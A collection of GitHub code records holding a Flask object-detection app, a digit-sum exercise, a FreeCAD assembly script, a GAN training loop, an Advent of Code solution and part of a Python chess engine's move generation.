+{"seq_id":"7530642537","text":"from imageai.Detection import ObjectDetection, keras_retinanet\r\nimport os\r\nfrom PIL import Image\r\nimport base64\r\nimport logging as log\r\nfrom flask import Flask, request, make_response\r\nfrom flask_restful import Resource, Api\r\nimport flask_restful as restful\r\nfrom keras.engine.saving import load_model\r\nfrom sqlalchemy import create_engine\r\nfrom json import dumps\r\nfrom flask import jsonify\r\nfrom flask_classful import FlaskView\r\nimport json\r\nfrom keras import backend as K\r\nimport tensorflow as tf\r\nfrom tkinter.filedialog import askopenfilename\r\nfrom pathlib import Path\r\nfrom tkinter import Tk\r\n\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nresult = dict()\r\n\r\n\r\ndef init():\r\n global model, graph\r\n # load the pre-trained Keras model\r\n # model = load_model('resnet50_coco_best_v2.0.1.h5')\r\n graph = tf.get_default_graph()\r\n\r\nTk().withdraw()\r\nfilename = askopenfilename()\r\nimg = Path(filename).name\r\nwith open(filename, \"rb\") as imageFile:\r\n # converting download.jpg to a String\r\n str_file = base64.b64encode(imageFile.read())\r\n print(str_file)\r\n\r\n\r\napp = Flask(__name__, template_folder='template')\r\n\r\n\r\n@app.route(\"/\", methods=[\"GET\",\"POST\"])\r\ndef predict():\r\n with graph.as_default():\r\n fh = open(\"imageToSave.png\", \"wb\")\r\n fh.write(base64.decodestring(str_file))\r\n fh.close()\r\n log.debug(\"File decrypted !!\")\r\n filename = \"imageToSave.png\"\r\n\r\n log.basicConfig(filename=\"logs.log\", level=log.DEBUG)\r\n # giving the filename\r\n # filename = \"image.jpg\"\r\n execution_path = os.getcwd()\r\n\r\n # creating the detector object for ObjectDetection\r\n log.info(\"Detector activated \")\r\n detector = ObjectDetection()\r\n detector.setModelTypeAsRetinaNet()\r\n detector.setModelPath(os.path.join(execution_path, \"resnet50_coco_best_v2.0.1.h5\"))\r\n detector.loadModel()\r\n detections = detector.detectObjectsFromImage(input_image=filename,\r\n output_image_path=os.path.join(execution_path, \"imagenew.jpg\"))\r\n\r\n # printing the found object names and the probability value\r\n result = dict()\r\n\r\n for eachObject in detections:\r\n # print(eachObject[\"name\"], \" : \", eachObject[\"percentage_probability\"])\r\n result.update({eachObject[\"name\"]: eachObject[\"percentage_probability\"]})\r\n\r\n print(result)\r\n return sendResponse(result)\r\n K.clear_session()\r\n # displaying image after object detection\r\n img = Image.open('imagenew.jpg')\r\n img.show()\r\n\r\n # passing an string value of image to object\r\n # object detect class gets inherited from imageconvert\r\n\r\n if request.method=='POST':\r\n return result\r\n\r\n@app.route('/form', methods=['GET', 'POST'])\r\ndef form_example():\r\n if request.method == 'POST':\r\n with graph.as_default():\r\n fh = open(\"imageToSave.png\", \"wb\")\r\n fh.write(base64.decodestring(str_file))\r\n fh.close()\r\n log.debug(\"File decrypted !!\")\r\n filename = \"imageToSave.png\"\r\n\r\n log.basicConfig(filename=\"logs.log\", level=log.DEBUG)\r\n # giving the filename\r\n # filename = \"image.jpg\"\r\n execution_path = os.getcwd()\r\n\r\n # creating the detector object for ObjectDetection\r\n log.info(\"Detector activated \")\r\n detector = ObjectDetection()\r\n detector.setModelTypeAsRetinaNet()\r\n detector.setModelPath(os.path.join(execution_path, \"resnet50_coco_best_v2.0.1.h5\"))\r\n detector.loadModel()\r\n detections = detector.detectObjectsFromImage(input_image=filename,\r\n 
output_image_path=os.path.join(execution_path, \"imagenew.jpg\"))\r\n\r\n # printing the found object names and the probability value\r\n result = dict()\r\n\r\n for eachObject in detections:\r\n # print(eachObject[\"name\"], \" : \", eachObject[\"percentage_probability\"])\r\n result.update({eachObject[\"name\"]: eachObject[\"percentage_probability\"]})\r\n\r\n print(result)\r\n return sendResponse(result)\r\n K.clear_session()\r\n\r\n return ''''''\r\n\r\n\r\ndef sendResponse(responseObj):\r\n response = jsonify(responseObj)\r\n return response\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print((\"* Loading Keras model and Flask starting server...\"\r\n \"please wait until server has fully started\"))\r\n init()\r\n app.run(threaded=True, debug=\"on\", port=9000)\r\n","repo_name":"nikzjadhav/Object-detection-flask","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":4691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"37228837022","text":"#zbroj znamenaka prirodnog broja\r\n#ulaz(n)\r\n#s = 0\r\n#dok je n > 0 činiti\r\n#{\r\n# s = s + n mod 10\r\n# n = n div 10\r\n#}\r\n#############################\r\n\r\nn = int(input (\"Upiši broj : \"))\r\nn0 = n\r\ns = 0\r\nwhile n > 0 :\r\n s = s + n % 10\r\n n = n // 10\r\nprint(\"Zbroj znamenaka broja \" +str(n0)+ \" je \" +str(s))\r\n","repo_name":"nekm/Informatika_matura","sub_path":"2019_j_18.py","file_name":"2019_j_18.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"hr","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"44374684744","text":"# Importing standard libs\nimport sys\n\n# Insert this directory into the PYTHONPATH to import experimental parameters from experiment_params.py\nsys.path.insert(0, \"${HOME}/work/git/Lab-Management/freecad_models/EM_Coupling_Experiment/code\")\n\n# Insert this directoryinto the PYTHONPATH to import Assembly 2 module\nsys.path.append('${HOME}/.FreeCAD/Mod/FreeCAD_assembly2')\n\n# Importing Assembly 2 libraries\n# Assembly2 is an additional FreeCAD workbench (https://github.com/hamish2014/FreeCAD_assembly2)\nimport importPart\nimport planeConstraint\nimport axialConstraint\n\n# Importing experiment specific parameters\n\n###############################################################################\n# Create and open a new file for assembly\n\nassembly_file = App.newDocument(\"daq\")\nApp.setActiveDocument(assembly_file.Name)\nApp.ActiveDocument = App.getDocument(assembly_file.Name)\nGui.ActiveDocument = Gui.getDocument(assembly_file.Name)\n\n###############################################################################\n# Import computer_table\ncomputer_table = importPart.importPart(filename = '../computer/models/Table.STEP', partName = None, doc_assembly = assembly_file)\n\nApp.ActiveDocument.recompute()\nGui.SendMsgToActiveView(\"ViewFit\")\nGui.activeDocument().activeView().viewAxonometric()\n\n# Fix the position and orientation of computer_table\ncomputer_table.Placement = App.Placement(App.Vector(0,0,0),App.Rotation(App.Vector(1,0,0),90))\n\n################################################################################\n# Import QM9 Data Acquisition System base\n\ndaq_base = importPart.importPart(filename = 'models/QM9_base.fcstd', partName = None, doc_assembly = assembly_file)\n\nApp.ActiveDocument.recompute()\nGui.SendMsgToActiveView(\"ViewFit\")\nGui.activeDocument().activeView().viewAxonometric()\n\n\n# Place on table\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base , \"Face227\") \nGui.Selection.addSelection(computer_table, \"Face010\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_table_surface = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\ndaq_base_table_surface.directionConstraint = u\"opposed\"\nApp.ActiveDocument.recompute()\n\n\n# Side offset\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base , \"Face232\") \nGui.Selection.addSelection(computer_table, \"Face005\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_table_side = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\ndaq_base_table_side.offset = 500\nApp.ActiveDocument.recompute()\n\n# Front offset\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base , \"Face236\") \nGui.Selection.addSelection(computer_table, \"Face007\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_table_front = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\ndaq_base_table_front.offset = -200\nApp.ActiveDocument.recompute()\n\n################################################################################\n# Import QM9 Data Acquisition System top\n\ndaq_top = importPart.importPart(filename = 'models/QM9_top.fcstd', partName = None, doc_assembly = assembly_file)\n\nApp.ActiveDocument.recompute()\nGui.SendMsgToActiveView(\"ViewFit\")\nGui.activeDocument().activeView().viewAxonometric()\n\n\n# Place on daq base\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base, \"Face265\") \nGui.Selection.addSelection(daq_top , \"Face126\")\n\nselection = 
Gui.Selection.getSelectionEx()\ndaq_base_top = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\ndaq_base_top.directionConstraint = u\"opposed\"\nApp.ActiveDocument.recompute()\n\n\n# Side mate\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base, \"Face242\") \nGui.Selection.addSelection(daq_top , \"Face133\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_top_side = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\n# Front mate\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base, \"Face226\") \nGui.Selection.addSelection(daq_top , \"Face157\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_top_front = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\n","repo_name":"QuazarTech/Lab-Management","sub_path":"freecad_models/QM9/QM9.py","file_name":"QM9.py","file_ext":"py","file_size_in_byte":4257,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"39882231349","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.utils as vutils\nfrom tqdm import tqdm\nfrom pickle import dump\n\n# set weights for stability\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)\n\n\nreal_label = 1\nfake_label = 0\n# Initialize BCELoss function\ncriterion_G = nn.BCELoss()\ncriterion_D = nn.BCELoss()\n\n\ndef training_loop(results_dir, num_epochs, dataloader, netD, netG, device, lr, beta1, nz):\n\n optimizerD = optim.Adam(netD.parameters(), lr=lr, betas=(beta1, 0.999))\n optimizerG = optim.Adam(netG.parameters(), lr=lr, betas=(beta1, 0.999))\n fixed_noise = torch.randn(128, nz, 1, 1, device=device)\n\n img_list = []\n G_losses = []\n D_losses = []\n\n iters = 0\n big_iters = 0\n\n print(\"Starting Training Loop...\")\n for epoch in range(num_epochs):\n\n # For each batch in the dataloader\n for i, data in tqdm(enumerate(dataloader, 0)):\n ############################\n # (1) Update D network: maximize log(D(x)) + log(1 - D(G(z)))\n ###########################\n ## Train with all-real batch\n netD.zero_grad()\n # Format batch\n real_cpu = data[0].to(device)\n b_size = real_cpu.size(0)\n label = torch.full((b_size,), real_label * 0.9, device=device)\n # Forward pass real batch through D\n output = netD(real_cpu).view(-1)\n # Calculate loss on all-real batch\n errD_real = criterion_D(output, label)\n # Calculate gradients for D in backward pass\n errD_real.backward()\n D_x = output.mean().item()\n\n ## Train with all-fake batch\n # Generate batch of latent vectors\n noise = torch.randn(b_size, nz, 1, 1, device=device)\n # Generate fake image batch with G\n fake = netG(noise)\n label.fill_(fake_label)\n # Classify all fake batch with D\n output = netD(fake.detach()).view(-1)\n # Calculate D's loss on the all-fake batch\n errD_fake = criterion_D(output, label)\n # Calculate the gradients for this batch\n errD_fake.backward()\n D_G_z1 = output.mean().item()\n # Add the gradients from the all-real and all-fake batches\n errD = errD_real + errD_fake\n # Update D\n optimizerD.step()\n\n ############################\n # (2) Update G network: maximize log(D(G(z)))\n ###########################\n netG.zero_grad()\n label.fill_(real_label) # fake labels are real for generator cost\n # Since we just updated D, perform another forward pass of all-fake batch through D\n output = netD(fake).view(-1)\n # Calculate G's loss based on this output\n errG = criterion_G(output, label)\n # Calculate gradients for G\n errG.backward()\n D_G_z2 = output.mean().item()\n # Update G\n optimizerG.step()\n\n # Output training stats\n if i % 50 == 0:\n print('[%d/%d][%d/%d]\\tLoss_D: %.4f\\tLoss_G: %.4f\\tD(x): %.4f\\tD(G(z)): %.4f / %.4f'\n % (epoch, num_epochs, i, len(dataloader),\n errD.item(), errG.item(), D_x, D_G_z1, D_G_z2))\n\n torch.save(netG, results_dir+\"generator.pyt\")\n torch.save(netD, results_dir+\"discriminator.pyt\")\n\n # Save Losses for plotting later\n G_losses.append(errG.item())\n D_losses.append(errD.item())\n\n # Check how the generator is doing by saving G's output on fixed_noise\n if (iters % 500 == 0) or ((epoch == num_epochs - 1) and (i == len(dataloader) - 1)):\n big_iters += 1\n with torch.no_grad():\n fake = netG(fixed_noise).detach().cpu()\n img_list.append(vutils.make_grid(fake, padding=2, 
normalize=True))\n torch.save(netG, results_dir+\"generator_snapshot\"+str(big_iters)+\".pyt\")\n torch.save(netD, results_dir+\"discriminator_snapshot\"+str(big_iters)+\".pyt\")\n dump(img_list,open(results_dir+\"image_list.pkl\",'wb'))\n\n iters += 1\n\n return D_losses, G_losses, img_list","repo_name":"ejnhbrown/ganmorph","sub_path":"rich_sandbox/Training_funcs.py","file_name":"Training_funcs.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"34528179248","text":"import numpy as np\nimport os\n\nINPUT = os.path.join(os.path.dirname(__file__), \"input.txt\")\n\nwith open(INPUT) as f:\n lines = f.readlines()\n\n# Remove trailing Whitespace and cast to int\nlines = [int(line.rstrip()) for line in lines]\n\n# Part 1\n# Take Difference between two successive elements. Count elements where difference > 0\nlines_arr = np.array(lines)\ndiff = np.diff(lines_arr)\nprint(diff[diff > 0].shape)\n\n\n# Part 2\n# Same as Part 1 but with moving window sum\nlines_arr = np.array(lines)\nmoving_window = np.ones((3,))\n\nwindow_sum = np.convolve(lines_arr, moving_window, mode=\"valid\")\ndiff = np.diff(window_sum)\nprint(diff[diff > 0].shape)\n","repo_name":"LiXiling/advent-of-code-2021","sub_path":"01/aoc_01.py","file_name":"aoc_01.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"70386054832","text":"#\n# Created by: Daymenion 16/05/2022\n#\n# this program under the GNU General Public License v3.0 license.\n\nimport tkinter as tk\nfrom tkinter import simpledialog\n\n\nclass GameState:\n def __init__(self):\n\n # board setup (8x8 board with empty squares)\n self.board = [\n [\"bR\", \"bN\", \"bB\", \"bQ\", \"bK\", \"bB\", \"bN\", \"bR\"],\n [\"bP\", \"bP\", \"bP\", \"bP\", \"bP\", \"bP\", \"bP\", \"bP\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"wP\", \"wP\", \"wP\", \"wP\", \"wP\", \"wP\", \"wP\", \"wP\"],\n [\"wR\", \"wN\", \"wB\", \"wQ\", \"wK\", \"wB\", \"wN\", \"wR\"]]\n\n self.whiteToMove = True # white to move first\n self.moveLog = [] # list of moves made\n self.whiteKingLocation = (7, 4) # white king location (row, col)\n self.blackKingLocation = (0, 4) # black king location (row, col)\n self.possibleMoveFunctions = {'P': self.getPawnMoves, 'N': self.getKnightMoves, 'B': self.getBishopMoves,\n 'R': self.getRookMoves, 'Q': self.getQueenMoves,\n 'K': self.getKingMoves} # dictionary of possible move functions for each piece\n self.enpassantPossible = () # the square for enpassant possible\n self.checkMate = False # checkmate flag\n self.staleMate = False # stalemate flag\n\n self.inCheck = False # check flag\n self.pins = [] # list of pins for each piece\n self.checks = [] # list of checks for each piece (for AI)\n\n self.currentCastlingRights = CastleRights(True, True, True, True) # wks, wqs, bks, bqs (True = can castle)\n # Deep Copy Rights object\n self.castleRightsLog = [\n CastleRights(self.currentCastlingRights.wks, self.currentCastlingRights.bks, self.currentCastlingRights.wqs,\n self.currentCastlingRights.bqs)] # wks, wqs, bks, bqs (True can castle) list of rights objects\n\n # Simple Chess Moves: Pawns, Knights, Bishops, Rooks, Queens, Kings (no castling)\n def makeMove(self, move):\n self.board[move.startRow][move.startCol] = \"--\" # remove piece from start square\n\n self.board[move.endRow][move.endCol] = move.pieceMoved # add piece to end square\n\n self.moveLog.append(move) # add move to move log\n self.whiteToMove = not self.whiteToMove # switch turn to next player\n\n if move.pieceMoved == 'wK': # if white king moved\n self.whiteKingLocation = (move.endRow, move.endCol) # update white king location\n elif move.pieceMoved == 'bK': # if black king moved\n self.blackKingLocation = (move.endRow, move.endCol) # update black king location\n\n # For Pawn Promotion:\n if move.isPawnPromotion:\n if move.AIPlaying:\n self.board[move.endRow][move.endCol] = move.pieceMoved[\n 0] + move.AIPromotionKey # add piece to end square\n else:\n ROOT = tk.Tk()\n\n ROOT.withdraw()\n # the input dialog\n\n while True:\n promotedPiece = simpledialog.askstring(\"Game Mode:\", \"Please select a game mode: \\nQ)Queen(Q) \"\n \"\\nR)Rook(R) \\nB)Bishop(B) \\nN)Knight(N)\",\n initialvalue=\"Q\") # ask for promotion piece\n\n print(promotedPiece)\n promotion = ['Q', 'R', 'B', 'N']\n if promotedPiece in promotion:\n self.board[move.endRow][move.endCol] = move.pieceMoved[\n 0] + promotedPiece # add piece to end square\n break\n else:\n print(\"invalid Promotion\")\n\n # Update Enpassant Variable only if Pawn Moves Two Squares:\n if move.pieceMoved[1] == 'P' and abs(move.startRow - move.endRow) == 2: # if pawn moved two squares\n 
self.enpassantPossible = ((move.startRow + move.endRow) // 2,\n move.startCol) # update enpassant variable\n else:\n self.enpassantPossible = () # reset enpassant variable\n\n # For Enpassant Move:\n if move.isEnpassantMove: # if enpassant move is true\n self.board[move.startRow][move.endCol] = '--' # remove captured pawn from board\n\n # For Castle Move:\n if move.isCastleMove:\n if move.endCol - move.startCol == 2: # King side Castle\n self.board[move.endRow][move.endCol - 1] = self.board[move.endRow][\n move.endCol + 1] # move rook to new square\n self.board[move.endRow][move.endCol + 1] = '--'\n else: # Queen Side Castle\n self.board[move.endRow][move.endCol + 1] = self.board[move.endRow][\n move.endCol - 2] # move rook to new square\n self.board[move.endRow][move.endCol - 2] = '--'\n\n # Updating Castle Rights on Each Move:\n self.updateCastleRights(move)\n self.castleRightsLog.append(\n CastleRights(self.currentCastlingRights.wks, self.currentCastlingRights.bks, self.currentCastlingRights.wqs,\n self.currentCastlingRights.bqs)) # add castle rights to log\n\n def undoMove(self): # undo move function\n\n if len(self.moveLog) != 0:\n\n move = self.moveLog.pop() # pop last move from log (undo last move)\n\n self.board[move.startRow][move.startCol] = move.pieceMoved # move piece back to start square\n self.board[move.endRow][move.endCol] = move.pieceCaptured # move piece back to end square\n self.whiteToMove = not self.whiteToMove # switching the turn\n if move.pieceMoved == 'wK':\n self.whiteKingLocation = (move.startRow, move.startCol) # update white king location\n elif move.pieceMoved == 'bK':\n self.blackKingLocation = (move.startRow, move.startCol) # update black king location\n\n # Undo Enpassant Move\n if move.isEnpassantMove:\n self.board[move.endRow][\n move.endCol] = '--' # Making The Ending square blank as the pawn captured was not in that square\n self.board[move.startRow][move.endCol] = move.pieceCaptured # move pawn back to start square\n self.enpassantPossible = (move.endRow, move.endCol) # update enpassant variable\n\n # Undo the captured\n if move.pieceMoved[1] == 'P' and abs(\n move.startRow - move.endRow) == 2: # if pawn moved two squares and captured\n self.enpassantPossible = () # reset enpassant variable\n\n # undo Castle Rights\n self.castleRightsLog.pop() # pop last castle rights from log\n newRights = self.castleRightsLog[-1] # get last castle rights from log\n self.currentCastlingRights = CastleRights(newRights.wks, newRights.bks, newRights.wqs,\n newRights.bqs) # update current castle rights\n\n # undo Castle Move\n if move.isCastleMove:\n if move.endCol - move.startCol == 2: # King side Castle\n self.board[move.endRow][move.endCol + 1] = self.board[move.endRow][\n move.endCol - 1] # move rook back to new square\n self.board[move.endRow][move.endCol - 1] = '--'\n else: # Queen Side Castle\n self.board[move.endRow][move.endCol - 2] = self.board[move.endRow][\n move.endCol + 1] # move rook back to new square\n self.board[move.endRow][move.endCol + 1] = '--'\n\n self.checkMate = False # reset checkmate variable\n self.staleMate = False # reset stalemate variable\n\n def updateCastleRights(self, move): # update castle rights function\n if move.pieceMoved == 'wK': # if white king moved\n self.currentCastlingRights.wks = False # set white king side castle to false\n self.currentCastlingRights.wqs = False # set white queen side castle to false\n elif move.pieceMoved == 'bK': # if black king moved\n self.currentCastlingRights.bks = False # set black king side castle to 
false\n self.currentCastlingRights.bqs = False # set black queen side castle to false\n elif move.pieceMoved == 'wR': # if white rook moved\n if move.startRow == 7: # if white rook moved from row 7\n if move.startCol == 0: # if white rook moved from col 0\n self.currentCastlingRights.wqs = False # set white queen side castle to false\n elif move.startCol == 7: # if white rook moved from col 7\n self.currentCastlingRights.wks = False # set white king side castle to false\n elif move.pieceMoved == 'bR': # if black rook moved\n if move.startRow == 0: # if black rook moved from row 0\n if move.startCol == 0: # if black rook moved from col 0\n self.currentCastlingRights.bqs = False # set black queen side castle to false\n elif move.startCol == 7: # if black rook moved from col 7\n self.currentCastlingRights.bks = False # set black king side castle to false\n if move.pieceCaptured == 'wR': # if white rook captured\n if move.startRow == 7: # if white rook moved from row 7\n if move.startCol == 0: # if white rook moved from col 0\n self.currentCastlingRights.wqs = False # set white queen side castle to false\n elif move.startCol == 7: # if white rook moved from col 7\n self.currentCastlingRights.wks = False # set white king side castle to false\n elif move.pieceCaptured == 'bR': # if black rook captured\n if move.startRow == 0: # if black rook moved from row 0\n if move.startCol == 0: # if black rook moved from col 0\n self.currentCastlingRights.bqs = False # set black queen side castle to false\n elif move.startCol == 7: # if black rook moved from col 7\n self.currentCastlingRights.bks = False # set black king side castle to false\n\n # every possible move that a piece can make without the concern of other pieces\n def getAllPossibleMoves(self): # get all possible moves function\n\n possibleMoves = [] # list of possible moves\n\n for row in range(len(self.board)):\n for col in range(len(self.board[row])):\n turn = self.board[row][col][0] # get the first character of the piece\n if (turn == 'w' and self.whiteToMove) or (\n turn == 'b' and not self.whiteToMove): # if it's correct turn and the piece is white or black\n piece = self.board[row][col][1] # get the second character of the piece\n self.possibleMoveFunctions[piece](row, col,\n possibleMoves) # call the function that corresponds to the piece\n\n return possibleMoves # return the list of possible moves\n\n def getValidMoves(self): # get valid moves function (returns a list of valid moves)\n\n moves = [] # list of valid moves\n self.inCheck, self.pins, self.checks = self.checkForPinsAndChecks() # check for pins and checks\n\n if self.whiteToMove: # if it is white's turn\n kingRow = self.whiteKingLocation[0] # get the row of the white king\n kingCol = self.whiteKingLocation[1] # get the col of the white king\n allyColor = 'w' # set the color of the pieces to white\n else: # if it is black's turn\n kingRow = self.blackKingLocation[0] # get the row of the black king\n kingCol = self.blackKingLocation[1] # get the col of the black king\n allyColor = 'b' # set the color of the pieces to black\n\n if self.inCheck: # if the king is in check (if the king is in check, then the king can't move)\n if len(self.checks) == 1: # if there is only one check\n moves = self.getAllPossibleMoves() # get all possible moves\n check = self.checks[0] # get the check\n checkRow = check[0] # get the row of the check\n checkCol = check[1] # get the col of the check\n pieceChecking = self.board[checkRow][checkCol] # get the piece that is checking the king\n validSquares 
= [] # list of valid squares\n if pieceChecking[0] == 'N': # if the piece checking the king is a knight\n validSquares = [(checkRow, checkCol)] # add the check square to the list of valid squares\n else:\n for i in range(1, 8): # for each direction\n validSquare = (kingRow + check[2] * i, kingCol + check[\n 3] * i) # get the valid square based on the direction of the check\n validSquares.append(validSquare) # add the valid square to the list of valid squares\n if validSquare[0] == checkRow and validSquare[\n 1] == checkCol: # if the valid square is the check square\n break # break out of the loop\n for i in range(len(moves) - 1, -1, -1):\n if moves[i].pieceMoved[1] != 'K': # if the piece moved is not a king\n if not (moves[i].endRow, moves[i].endCol) in validSquares: # if the end square\n # is not a valid square for the piece to move to\n moves.remove(moves[i]) # remove the move from the list of valid moves\n else:\n self.getKingMoves(kingRow, kingCol, moves) # get the king moves\n else:\n moves = self.getAllPossibleMoves() # get possible moves (if the king isn't in check, then king can move)\n self.getCastleMoves(kingRow, kingCol, moves,\n allyColor) # get the castle moves (if the king is not in check, then the king can move)\n\n return moves # return the list of valid moves\n\n def squareUnderAttack(self, row, col): # square under attack function (returns true if the square is under attack)\n\n self.whiteToMove = not self.whiteToMove # switch to opponent\n oppMoves = self.getAllPossibleMoves() # get all possible moves for the opponent\n\n self.whiteToMove = not self.whiteToMove # switch back to the original color\n\n for move in oppMoves: # for each move\n if move.endRow == row and move.endCol == col: # if the move ends at the square under attack\n return True # return true\n\n return False\n\n def getPawnMoves(self, row, col, possibleMoves): # get pawn moves function\n piecePinned = False # if the piece is pinned\n pinDirection = () # direction of the pin\n for i in range(len(self.pins) - 1, -1, -1): # for each pin in the list of pins\n if self.pins[i][0] == row and self.pins[i][1] == col: # if the pin is at the square under attack\n piecePinned = True # set piecePinned to true\n pinDirection = (self.pins[i][2], self.pins[i][3]) # get the direction of the pin\n self.pins.remove(self.pins[i]) # remove the pin from the list of pins\n break\n\n # for white pieces\n if self.whiteToMove:\n\n # move up 1 or 2 squres\n if self.board[row - 1][col] == \"--\": # if the square above is empty\n if not piecePinned or pinDirection == (-1, 0): # if the piece isn't pinned or the pin direction is up\n possibleMoves.append(\n Move((row, col), (row - 1, col), self.board)) # add the move to the list of possible moves\n if row == 6 and self.board[row - 2][\n col] == \"--\": # if the pawn is on its starting square and the square above it is empty\n possibleMoves.append(\n Move((row, col), (row - 2, col), self.board)) # add the move to the list of possible moves\n\n # move diagonals\n if col - 1 >= 0: # if the square to the left is on the board\n if self.board[row - 1][col - 1][0] == 'b': # if the square to the left is black\n if not piecePinned or pinDirection == (\n -1, -1): # if the piece isn't pinned or the pin direction is up left\n possibleMoves.append(Move((row, col), (row - 1, col - 1),\n self.board)) # add the move to the list of possible moves\n if (row - 1, col - 1) == self.enpassantPossible: # if the square to the left is the enpassant square\n possibleMoves.append(Move((row, col), (row - 1, col - 
1), self.board,\n isEnpassantMove=True)) # add the move to the list of possible moves\n\n if col + 1 <= 7: # if the square to the right is on the board\n if self.board[row - 1][col + 1][0] == 'b': # if the square to the right is black\n if not piecePinned or pinDirection == (\n -1, 1): # if the piece isn't pinned or the pin direction is up right\n possibleMoves.append(Move((row, col), (row - 1, col + 1),\n self.board)) # add the move to the list of possible moves\n if (row - 1, col + 1) == self.enpassantPossible: # if the square to the right is the enpassant square\n possibleMoves.append(Move((row, col), (row - 1, col + 1), self.board,\n isEnpassantMove=True)) # add the move to the list of possible moves\n\n # for black pieces\n\n else:\n\n # move down 1 or 2 squares\n if self.board[row + 1][col] == \"--\": # if the square below is empty\n if not piecePinned or pinDirection == (1, 0): # if the piece isn't pinned or the pin direction is down\n possibleMoves.append(\n Move((row, col), (row + 1, col), self.board)) # add the move to the list of possible moves\n if row == 1 and self.board[row + 2][\n col] == \"--\": # if the pawn is on its starting square and the square below it is empty\n possibleMoves.append(\n Move((row, col), (row + 2, col), self.board)) # add the move to the list of possible moves\n\n # move diagonals\n if col - 1 >= 0: # if the square to the left is on the board\n if self.board[row + 1][col - 1][0] == 'w': # if the square to the left is white\n if not piecePinned or pinDirection == (\n 1, 1): # if the piece isn't pinned or the pin direction is down left\n possibleMoves.append(Move((row, col), (row + 1, col - 1),\n self.board)) # add the move to the list of possible moves\n if (row + 1, col - 1) == self.enpassantPossible: # if the square to the left is the enpassant square\n possibleMoves.append(Move((row, col), (row + 1, col - 1), self.board,\n isEnpassantMove=True)) # add the move to the list of possible moves\n\n if col + 1 <= 7: # if the square to the right is on the board\n if self.board[row + 1][col + 1][0] == 'w': # if the square to the right is white\n if not piecePinned or pinDirection == (\n 1, -1): # if the piece isn't pinned or the pin direction is down right\n possibleMoves.append(Move((row, col), (row + 1, col + 1),\n self.board)) # add the move to the list of possible moves\n if (row + 1, col + 1) == self.enpassantPossible: # if the square to the right is the enpassant square\n possibleMoves.append(Move((row, col), (row + 1, col + 1), self.board,\n isEnpassantMove=True)) # add the move to the list of possible moves\n\n def getKnightMoves(self, row, col, possibleMoves): # get knight moves function\n piecePinned = False # if the piece is pinned\n for i in range(len(self.pins) - 1, -1, -1): # for each pin in the list of pins\n if self.pins[i][0] == row and self.pins[i][1] == col: # if the pin is at the square under attack\n piecePinned = True # set piecePinned to true\n self.pins.remove(self.pins[i]) # remove the pin from the list of pins\n break\n\n knightMoves = ((-1, -2), (-1, 2), (1, -2), (1, 2), (-2, -1), (-2, 1), (2, -1), (2, 1))\n # L shapes as in left_down2, left_up2, right_down2, right_up2, left2_down, left2_up, right2_down, right2_up\n if self.whiteToMove: # if white to move\n allyColor = \"w\"\n else:\n allyColor = \"b\"\n\n for n_move in knightMoves: # for each move in the list of knight moves\n endRow = row + n_move[0] # get the row of the end square\n endCol = col + n_move[1] # get the column of the end square\n\n if 0 <= endRow <= 7 and 0 <= endCol 
<= 7: # if the end square is on the board\n if not piecePinned: # if the piece isn't pinned\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece[0] != allyColor: # if the end square is not the same color as the piece\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n\n def getBishopMoves(self, row, col, possibleMoves): # get bishop moves function\n piecePinned = False # if the piece is pinned\n pinDirection = () # the pin direction\n for i in range(len(self.pins) - 1, -1, -1): # for each pin in the list of pins\n if self.pins[i][0] == row and self.pins[i][1] == col: # if the pin is at the square under attack\n piecePinned = True # set piecePinned to true\n pinDirection = (self.pins[i][2], self.pins[i][3]) # set pinDirection to the pin direction\n self.pins.remove(self.pins[i]) # remove the pin from the list of pins\n break\n\n bishopMoves = ((-1, -1), (1, -1), (-1, 1), (1, 1)) # left_down, right_down, left_up, right_up\n if self.whiteToMove:\n enemyColor = \"b\"\n else:\n enemyColor = \"w\"\n\n for b_moves in bishopMoves: # for each move in the list of bishop moves\n for i in range(1, 8): # for each square in the row\n endRow = row + b_moves[0] * i # get the row of the end square\n endCol = col + b_moves[1] * i # get the column of the end square\n if 0 